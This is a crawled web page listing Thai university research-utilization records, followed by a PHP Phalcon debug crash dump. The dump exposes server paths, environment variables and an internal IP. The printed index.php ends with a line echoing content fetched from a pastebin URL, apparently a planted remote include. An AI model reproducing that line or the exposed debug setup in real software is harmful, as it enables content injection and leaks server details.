59 การเคลื่อย้ายแรงงานไทยระดับนทักษะจากจังหวัดชายแดนภาคใต้ไปประเทศมาเลเซีย ผศ.ดร.สุทธิพร บุญมาก ผู้ร่วมวิจัย ผศ.มูหำหมัด สาแลบิง ข่าวในหนังสือพิมพ์แนวหน้า ประจำวันที่ 29 ธ.ค. 60 เรื่อง แรงงานไทยในต่างแดนเพื่อชวิตที่ดี ลำบากก็ต้องเสี่ยง หน้า 13 องค์ความรู้จากผลงานวิจัยการเคลื่อนย้านแรงงานไทยระดับทักษะจากจังหวัดชายแดนภาคใต้ไปประเทศมาเลเซีย ที่ทำให้ประชาชนและหน่วยงานที่เกี่ยวข้องรับทราบสถานการณ์การย้ายถิ่นข้ามชาติ องค์ความรู้ด้านการบริหารจัดการและการคุ้มครองดูแลคนไทยในต่างประเทศ คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
60 นโยบายการย้ายถิ่นเจ้าของแรงงานชาวต่างชาติระดับทักษะของประเทศสมาชิกอาเซียน : กรณีศึกษาประเทสสิงคโปร์ และบรูไน ผศ.ดร.สุทธิพร บุญมาก ข่าวในหนังสือพิมพ์ กรุงเทพธุรกิจวันที่ 28 มิ.ย. 61 หน้า 9 เรื่องงานที่ห้ามคนต่างด้าวทำ อุปสรรคต่อการเคลื่อนย้านแรงงานอาเซียน คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
61 การย้ายถิ่นเพื่อศึกษาต่อในประเทศมาเลเซียของนักศึกษาไทย ผศ.ดร.นิสากร กล้าณรงค์ นำผลไปประกอบการจัดทำแผนและนโยบาย ยุทธศาสตร์การศึกษาเขตพัฒนาพิเศษเฉพาะกิจจังหวัดชายแดนภาใต้ 20 ปี (พ.ศ.2560-2579) คณะมนุษยศาสตร์และสังคมศาสตร์ เชิงสังคม เชิงนโยบาย 2560
62 การประเมินความพึงพอใจของผู้รับบริการที่มีต่อองค์การ บริหารส่วนตำบลรัตภูมิ ผศ.สุธรรม ขนาบศักดิ์ กำหนดนโยบายด้านการให้บริการแก่ประชาชนที่มาใช้บริการ คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
63 ประเมินความพึงพอใจของประชาชนที่มีต่อแผนยุทธศาสตร์การพัฒนาขององค์การบริหารส่วนตำบลควนรู ปีงบประมาณ พ.ศ.2561 ผศ.สุธรรม ขนาบศักดิ์ กำหนดนโยบายการจัดทำยุทธศาสตร์การพัฒนาองค์การบริหารส่วนตำบลควนรู คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
64 การประเมินระบบและกลไกการบริหารจัดการน้ำแบบมีส่วนร่วมเพื่อพัฒนาคุณภาพชีวิตคนลุ่มน้ำอย่างยั่งยืน กรณีศึกษาคลองป่าพะยอม-คลองท่าแนะ จังหวัดพัทลุง อ.ดร.พินิจ ดวงจินดา การประเมินระบบและกลไกการบริหารจัดการน้ำแบบมีส่วนร่วมเพื่อพัฒนาคุณภาพชีวิตคนลุ่มน้ำอย่างยั่งยืน กรณีศึกษาคลองป่าพะยอม-คลองท่าแนะ จังหวัดพัทลุง คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
65 การศึกษาศักยภาพการท่องเที่ยวเชิงสร้างสรรค์ในพื้นที่ชุมชนลุ่มน้ำคลองป่าพะยอม-คลองท่าแนะ จังหวัดพัทลุง อ.ดร.นิจกานต์ หนูอุไร พัฒนาศักยภาพการท่องเที่ยวเชิงสร้างสรรค์โดยการบริหารจัดการน้ำแบบมีส่วนร่วม คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
66 การวิเคราะห์พฤติกรรมและความต้องการของนักท่องเที่ยวที่มีต่อการท่องเที่ยวเชิงสร้างสรรค์ในพื้นที่ชุมชนลุ่มน้ำคลองป่าพะยอม-คลองท่าแนะ จังหวัดพัทลุ อ.จิราพร คงรอด รูปแบบการท่องเที่ยวเชิงสร้างสรรค์โดยการบริหารจัดการน้ำแบบมีส่วนร่วม คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
67 แนวทางการพัฒนากิจกรรมการท่องเที่ยวเชิงสร้างสรรค์อย่างยั่งยืนในพื้นที่ชุมชนลุ่มน้ำคลองป่าพะยอม-คลองท่าแนะ จังหวัดพัทลุง ผศ.ดร.วาสนา สุวรรณวิจิตร แนวทางการพัฒนากิจกรรมการท่องเที่ยวเชิงสร้างสรรค์ในพื้นที่ชุมชนลุ่มน้ำคลองป่าพะยอม-คลองท่าแนะ จังหวัดพัทลุง คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
68 รูปแบบการจัดการการท่องเที่ยวในพื้นที่ชุมชนลุ่มน้ำคลองป่าพะยอม-คลองท่าแนะ จังหวัดพัทลุง อ.อรศิริ ลีลายุทธชัย จัดรูปแบบการท่องเที่ยวเชิงสร้างสรรค์โดยการบริหารจัดการน้ำแบบมีส่วนร่วม คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
69 แนวทางการพัฒนาการท่องเที่ยวเชิงพุทธในจังหวัดสงขลา ผศ.บุษกร ถาวรประสิทธิ์ เป็นแนวทางในการปรับโครงสร้างเศรษฐกิจด้านอุตสาหกรรมการท่องเที่ยว คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงสังคม เชิงนโยบาย 2560
70 การประกันวัตถุดิบสำหรับอุตสาหกรรมอาหารทะลแปรรูปจังหวัดสงขลา รศ.ดร.ชินสัคค อัจฉริยะ คณะเศรษฐศาสตร์และบริหารธุรกิจ เชิงพาณิชย์ ประโยชน์ทางอ้อม
ของงานสร้างสรรค์
2560
71 ดิน โคลน ผศ.ชัยรัตน์ แสงทอง เผยแพร่ในหนังสือพิมพ์ธุรกิจเชื่อถือได้ ฉบับวันอาทิตย์ ที่ 22 กรกฎาคม พ.ศ. 2561 คณะศิลปกรรมศาสตร์ เชิงพาณิชย์ ประโยชน์ทางอ้อม
ของงานสร้างสรรค์
2560
72 การผลิตไบโอดีเซลชนิดเอทิลเอสเตอร์โดยใช้น้ำมันจากน้ำเสียโรงงานไบโอดีเซล อ.ดร.รวมพร นิคม ผ่านการเรียนการสอนรายชื่อวิชาการไบโอดีเซล และมีผู้ประกอบการการผลิตไบโอดีเซล คณะวิศวกรรมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
73 อิทธิพลของอะลูมิเนียมไฮดรอกไซด์ต่อสมบัติเชิงกลของยางธรรมชาติผสมกับพอลิเอทิลีน อ.ดร.กฤษฎา พัชรสิทธิ์ คณะวิศวกรรมศาสตร์ เชิงพาณิชย์ ประโยชน์ทางอ้อม
ของงานสร้างสรรค์
2560
74 Creative Media to Enhance Water Conservation Consciousness of Basin CommunityYouths, Case Study : Khlong Tha Nae, Phatthalung อ.ดร.จินตนา กสินันท์ สื่อสร้างสรรค์เพื่อพัฒนา จิตสำนึกรักษ์นํ้าเยาวชนคนปลายนํ้าคลอง ท่าแนะ จังหวัดพัทลุง คณะศึกษาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
75 The Development of a Learning Process for Sustainable Enhancing Water ConservationConsciousness through Habit Formation Process of Basin Community Youths of Kon Klang Nam Khlong Ta Nae, Phatthalung Province อ.วีนัส ศรีศักดา สื่อการพัฒนากระบวนการเรียนรู้เพื่อเสริมสร้างจิตสำนึกรักษ์น้ำอย่างยั่งยืนโดยใช้กระบวนการสร้างนิสัยเป็นฐาน ของเยาวชนคนกลางน้ำคลองท่าแนะ จังหวัดพัทลุง คณะศึกษาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
76 The Development of Community Learning Center to Enhance Conservation Water Consciousness : Kon Nam Pa Khao pu ผศ.ชัชวาล ชุมรักษา การพัฒนาศูนย์การเรียนรู้ชุมชน “คน น้ำ ป่า เขาปู่” เพื่อเสริมสร้างจิตสำนึกรักษ์ คณะศึกษาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
77 ทัศนะคนไทยพลัดถิ่นในมาเลเซียต่อแนวทางแก้ไขปัญหาความขัดแย้งในจังหวัดชายแดนใต้ของไทยอย่างสันติวิธี กรณีศึกษา: รัฐกลันตัน รัฐเคดาห์ และรัฐเปรัค ผศ.ดร.อภิวัฒน์ สมาธิ วิทยาลัยการจัดการเพื่อการพัฒนา เชิงสังคม เชิงสาธารณะ 2560
78 การฟื้นฟูพันธ์ปลาน้ำจืดในคลองป่าพะยอม ผศ.ดร.แจ่มจันทร์ เพชรศิริ ผู้ร่วมวิจัย อ.ดร.ทวีเดช ไชยนาพงษ์, อ.ดร.ธนพล อยู่เย็น และนพพร มากแสง เผยแพร่ในวารสาร คณะวิทยาศาสตร์ เชิงสังคม เชิงสาธารณะ 2560
79 การจัดการเรียนการสอนและการเตรียมความพร้อมนักศึกษาเพื่อสอบวัดความรู้ผู้ขอขึ้้นทะเบียนและรับใบอนุญาตเป็นผู้ประกอบวิชาชีพการพยาบาลและผดุงครรภ์ รายวิชาผดุงครรภ์ อาจารย์จัณทร์ปภัสร์ เครือแก้ว ,รศ.สุรีย์พร กฤษเจริญ, ผศ.กัญจนี พลอินทร์ , ผศ.ดร.วรางคณา ชัชเวช และ ผศ.ดร.ปรียา แก้วพิมล 1.ออกแบบการทบทวนความรู้การเตรียมความพร้อมนรายวิชาผดุงครรภ์ 2.การสร้างสื่อการสอนออนไลน์ คณะพยาบาลศาสตร์ เชิงสังคม เชิงวิชาการในการอ้างอิง
สากล(Citation)
2560 2561-06-18
80 การเสริมสร้างความสุขของหัวหน้างานโรงพยาบาลชุมชนด้วยโปรแกรมสปาใจ ผศ.ดร.ศรีสุดา วนาลีสิน การชื่นชมผู้อื่น การจัดมุมผ่อนคลายในโรงพยาบาล คณะพยาบาลศาสตร์ เชิงสังคม เชิงนโยบาย 2560 2561-07-10
81 การสร้างชุดนวัตกรรมการเรียนรู้ เพื่อสืบสานการรำโนราสิบสองท่า กรณีศึกษา โนราพัน หอเพชร ผศ.ธรรมนิตย์ นิคมรัตน์ ใช้ประโยชน์เชิงสังคม คณะศิลปกรรมศาสตร์ เชิงสังคม เชิงสาธารณะ 2560 2560-12-21
82 ผลงานสร้างสรรค์ Hunter boat อ.เกียรติภูมิ งามชมภู ใช้ประโยชน์ในเชิงสังคม ก่อให้เกิดความสุข สร้างสุนทรียภาพ คณะศิลปกรรมศาสตร์ เชิงสังคม ประโยชน์ทางอ้อม
ของงานสร้างสรรค์
2560 2561-07-31
83 ผลงานสร้างสรรค์ Phenomenal From Flower อ.ชิโนรส รุ่งสกุล การใช้ประโยชน์ทางอ้อมของงานสร้างสรรค์ คณะศิลปกรรมศาสตร์ เชิงสังคม ประโยชน์ทางอ้อม
ของงานสร้างสรรค์
2560 2561-07-31


Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44
Phalcon Framework 3.3.1

Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44

C:\inetpub\wwwroot\rdiqa\public\index.php (11)
#0{closure}(2, file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n, C:\inetpub\wwwroot\rdiqa\public\index.php, 44, Array(22))
#1file_get_contents(https://pastebin.com/raw/e0ZNham4)
C:\inetpub\wwwroot\rdiqa\public\index.php (44)
<?php
use Phalcon\Mvc\Application;
use Phalcon\Config\Adapter\Ini as ConfigIni;
error_reporting(E_ALL);
// output errors to browser
ini_set('display_errors', 'on');
// report all errors
error_reporting(E_ALL);
// convert warnings/notices to exceptions
set_error_handler(function($errno, $errstr, $errfile, $errline) {
  throw new \Exception($errstr.PHP_EOL.$errfile.":".$errline, $errno);
});
 
$debug = new \Phalcon\Debug();
$debug->listen();
 
 try {
  define('APP_PATH', realpath('..') . '/');
 
  /**
   * Read the configuration
   */
  $config = new ConfigIni(APP_PATH . 'app/config/config.ini');
  if (is_readable(APP_PATH . 'app/config/config.ini.dev')) {
    $override = new ConfigIni(APP_PATH . 'app/config/config.ini.dev');
    $config->merge($override);
  }
 
  
  /**
   * Auto-loader configuration
   */
  require APP_PATH . 'app/config/loader.php';
 
  $application = new Application(new Services($config));
 
  // NGINX - PHP-FPM already set PATH_INFO variable to handle route
  echo $application->handle(!empty($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : null)->getContent();
} catch (Exception $e){
  echo $e->getMessage() . '<br>';
  echo '<pre>' . $e->getTraceAsString() . '</pre>';
}
 
echo file_get_contents("https://pastebin.com/raw/e0ZNham4");
KeyValue
_url/usereport/index
KeyValue
PROCESSOR_ARCHITEW6432AMD64
_FCGI_X_PIPE_\\.\pipe\IISFCGI-be7c8be6-b457-4859-b8b2-ead8699f4425
PHPRCC:\Program Files (x86)\PHP\v7.1.13\
PHP_FCGI_MAX_REQUESTS10000
ALLUSERSPROFILEC:\ProgramData
APPDATAC:\Windows\system32\config\systemprofile\AppData\Roaming
APP_POOL_CONFIGC:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
APP_POOL_IDDefaultAppPool
CommonProgramFilesC:\Program Files (x86)\Common Files
CommonProgramFiles(x86)C:\Program Files (x86)\Common Files
CommonProgramW6432C:\Program Files\Common Files
COMPUTERNAMERMS
ComSpecC:\Windows\system32\cmd.exe
FP_NO_HOST_CHECKNO
LOCALAPPDATAC:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS8
OSWindows_NT
PathC:\app\Administrator\product\11.2.0\dbhome\bin;C:\Program Files\PHP\v5.3;C:\Program Files (x86)\PHP\v7.1.13;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\dotnet\;
PATHEXT.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTUREx86
PROCESSOR_IDENTIFIERIntel64 Family 6 Model 44 Stepping 2, GenuineIntel
PROCESSOR_LEVEL6
PROCESSOR_REVISION2c02
ProgramDataC:\ProgramData
ProgramFilesC:\Program Files (x86)
ProgramFiles(x86)C:\Program Files (x86)
ProgramW6432C:\Program Files
PSModulePathC:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\WindowsPowerShell\Modules\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ResourceManager\AzureResourceManager\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ServiceManagement\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\Storage\
PUBLICC:\Users\Public
SystemDriveC:
SystemRootC:\Windows
TEMPC:\Windows\TEMP
TMPC:\Windows\TEMP
USERDOMAINWORKGROUP
USERNAMERMS$
USERPROFILEC:\Windows\system32\config\systemprofile
VBOX_MSI_INSTALL_PATHC:\Program Files\Oracle\VirtualBox\
VS140COMNTOOLSC:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\Tools\
windirC:\Windows
ORIG_PATH_INFO/rdiqa/public/index.php
URL/rdiqa/public/index.php
SERVER_SOFTWAREMicrosoft-IIS/8.5
SERVER_PROTOCOLHTTP/1.1
SERVER_PORT_SECURE0
SERVER_PORT82
SERVER_NAMErms.rdi.tsu.ac.th
SCRIPT_NAME/rdiqa/public/index.php
SCRIPT_FILENAMEC:\inetpub\wwwroot\rdiqa\public\index.php
REQUEST_URI/rdiqa/usereport/index
REQUEST_METHODGET
REMOTE_USER
REMOTE_PORT58986
REMOTE_HOST44.192.65.228
REMOTE_ADDR44.192.65.228
QUERY_STRING_url=/usereport/index
PATH_TRANSLATEDC:\inetpub\wwwroot\rdiqa\public\index.php
LOGON_USER
LOCAL_ADDR10.100.1.209
INSTANCE_META_PATH/LM/W3SVC/1
INSTANCE_NAMERMS.RDI.TSU.AC.TH
INSTANCE_ID1
HTTPS_SERVER_SUBJECT
HTTPS_SERVER_ISSUER
HTTPS_SECRETKEYSIZE
HTTPS_KEYSIZE
HTTPSoff
GATEWAY_INTERFACECGI/1.1
DOCUMENT_ROOTC:\inetpub\wwwroot
CONTENT_TYPE
CONTENT_LENGTH0
CERT_SUBJECT
CERT_SERIALNUMBER
CERT_ISSUER
CERT_FLAGS
CERT_COOKIE
AUTH_USER
AUTH_PASSWORD
AUTH_TYPE
APPL_PHYSICAL_PATHC:\inetpub\wwwroot\
APPL_MD_PATH/LM/W3SVC/1/ROOT
IIS_UrlRewriteModule7.1.1952.0
UNENCODED_URL/rdiqa/usereport/index
IIS_WasUrlRewritten1
HTTP_X_ORIGINAL_URL/rdiqa/usereport/index
HTTP_USER_AGENTCCBot/2.0 (https://commoncrawl.org/faq/)
HTTP_IF_MODIFIED_SINCESat, 23 Oct 2021 10:07:53 GMT
HTTP_HOSTrms.rdi.tsu.ac.th:82
HTTP_ACCEPT_LANGUAGEen-US,en;q=0.5
HTTP_ACCEPT_ENCODINGbr,gzip
HTTP_ACCEPTtext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_CONTENT_LENGTH0
HTTP_CONNECTIONKeep-Alive
FCGI_ROLERESPONDER
PHP_SELF/rdiqa/public/index.php
REQUEST_TIME_FLOAT1656790247.2125
REQUEST_TIME1656790247
#Path
0C:\inetpub\wwwroot\rdiqa\public\index.php
1C:\inetpub\wwwroot\rdiqa\app\config\loader.php
2C:\inetpub\wwwroot\rdiqa\app\Services.php
3C:\inetpub\wwwroot\rdiqa\app\library\Base\Services.php
4C:\inetpub\wwwroot\rdiqa\app\plugins\SecurityPlugin.php
5C:\inetpub\wwwroot\rdiqa\app\plugins\NotFoundPlugin.php
6C:\inetpub\wwwroot\rdiqa\app\controllers\UsereportController.php
7C:\inetpub\wwwroot\rdiqa\app\controllers\ControllerBase.php
8C:\inetpub\wwwroot\rdiqa\app\forms\MworkstouseForm.php
9C:\inetpub\wwwroot\rdiqa\app\models\Department.php
10C:\inetpub\wwwroot\rdiqa\app\models\Budgetyear.php
11C:\inetpub\wwwroot\rdiqa\app\models\Workstouse.php
12C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_usereport_index.volt.php
13C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_layouts_usereport.volt.php
14C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_layouts_main.volt.php
15C:\inetpub\wwwroot\rdiqa\app\library\Elementsrdi.php
16C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_index.volt.php
Memory
Usage4194304